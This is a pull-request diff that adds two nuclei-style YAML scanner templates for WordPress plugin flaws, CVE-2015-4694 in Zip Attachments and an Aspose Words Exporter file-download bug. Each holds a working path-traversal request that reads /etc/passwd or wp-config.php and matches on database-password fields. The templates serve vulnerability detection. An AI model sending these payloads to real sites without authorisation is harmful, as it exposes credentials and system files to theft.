Merge pull request #99 from projectdiscovery/master

Updation

cves/2015/CVE-2015-4694.yaml

@@ -0,0 +1,30 @@
+id: CVE-2015-4694
+
+info:
+  name: Zip Attachments <= 1.1.4 - Arbitrary File Download
+  author: 0x_Akoko
+  severity: high
+  description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file.
+  reference: https://wpscan.com/vulnerability/8047
+  tags: lfi,wordpress,cve,cve2015,wp-plugin
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.60
+    cve-id: CVE-2015-4694
+    cwe-id: CWE-22
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd'
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

vulnerabilities/wordpress/aspose-words-file-download.yaml

@@ -0,0 +1,29 @@
+id: aspose-words-file-download
+
+info:
+  name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download
+  author: 0x_Akoko
+  severity: high
+  description: The Aspose.Words Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability.
+  reference:
+    - https://wpscan.com/vulnerability/7869
+    - https://wordpress.org/plugins/aspose-doc-exporter
+  tags: wordpress,wp-plugin,lfi
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200